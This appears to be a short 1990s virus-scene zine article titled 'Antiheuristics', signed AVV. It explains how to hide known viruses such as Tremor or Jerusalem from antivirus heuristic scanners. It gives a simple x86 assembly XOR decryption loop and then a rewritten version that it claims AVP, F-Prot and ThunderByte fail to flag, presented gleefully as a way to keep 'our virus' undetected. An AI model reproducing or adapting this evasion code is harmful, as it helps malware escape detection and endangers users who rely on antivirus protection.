Antiheuristics ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> AVV We're used to the newest antivirus promising a total protection against unknown viruses, with what they call heuristics. And though being an im- portant weapon against viruses, it isn't that safe they assure. We won't explain what heuristics are (it is just looking for several instructions common to all viruses, which will show their presence). Nevertheless, if we hide these instructions, the antivirus won't detect anything and will happily say there's no danger, when checking a modified version of Neuro- quila, Tremor, Zhengxi, etc., which will be encrypted for these AVs. Technique is easy. We just have to use a simple encryption routine with which the antivirus will note nothing. AVP, F-Prot and ThunderByte recog- nize several encryption routines. Now, the following routine decrypts a previously encrypted code: lea di,enc_start ; ds:di -> first encrypted byte mov cx,enc_size ; cx has code's length loop1: mov al,byte ptr es:[di] xor al,0cfh ; we'll simply xor each byte stosb ; and store it back loop loop1 This routine is easy to get caught by an antivirus, and will discover the hidden virus. But let's change slightly the routine: lea di,enc_start mov si,di mov cx,enc_size mov dh,0cfh loop1: xor byte ptr es:[di],dh movsb loop loop1 This routine does exactly the same, but isn't caught by the heuristic scan of any antivirus, so no crappy AV will decrypt anything, and our vi- rus won't be detected... :) If the programmer is careful of not using any garbage code, all the AVs will fail to detect any virus, no matter how famous it is... even Jerusalem! :) This demonstrates that heuristics are not as safe as they appear to be. Greets, AVV.